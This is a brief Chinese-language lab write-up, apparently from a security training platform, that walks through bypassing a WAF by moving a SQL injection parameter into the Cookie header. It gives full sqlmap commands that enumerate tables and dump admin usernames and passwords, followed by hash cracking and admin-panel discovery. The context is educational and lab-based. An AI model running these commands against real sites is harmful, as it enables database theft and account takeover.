sql注入之绕过waf(cookie注入)
我们看一下题目:
网址:http://kypt8004.ia.aqlab.cn/index.asp
点击一条新闻,查看相关信息
http://kypt8004.ia.aqlab.cn/shownews.asp?id=171
进行简单注入测试
我们再来看一下该表的列数
进过测试,当order by =11时,会显示数据库错误,可想该表的列数为10列,如图所示。
当我们使用union关键字再一次进行测试的时候,waf又将其过滤掉
所以到这里,我们可以想到,waf设置有一个黑名单过滤问题
(在此处,还调试了大小写编码,一些其他绕过方式,但是都没成功)
所以我们在这里使用Cookie绕过。
使用Burp抓包,改一下Cookie看一下效果
抓住一个包:
修改Cookie
我们发现,只是爆出错误,并没有waf提示,所以绕过成功
我们可以sqlmap跑一下数据
跑一下表(tables)
sqlmap>sqlmap.py -u "http://kypt8004.ia.aqlab.cn/shownews.asp?" --cookie="id=171" --level 2 --tables
跑出admin表的列
sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column
接下里,我们跑一下username和password
sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password
我们在MD5解密后,在在进行一次扫描网站
我们现在去扫描网站,在进行一次登录。(使用御剑)
找到一个登录,进行登录
评论留言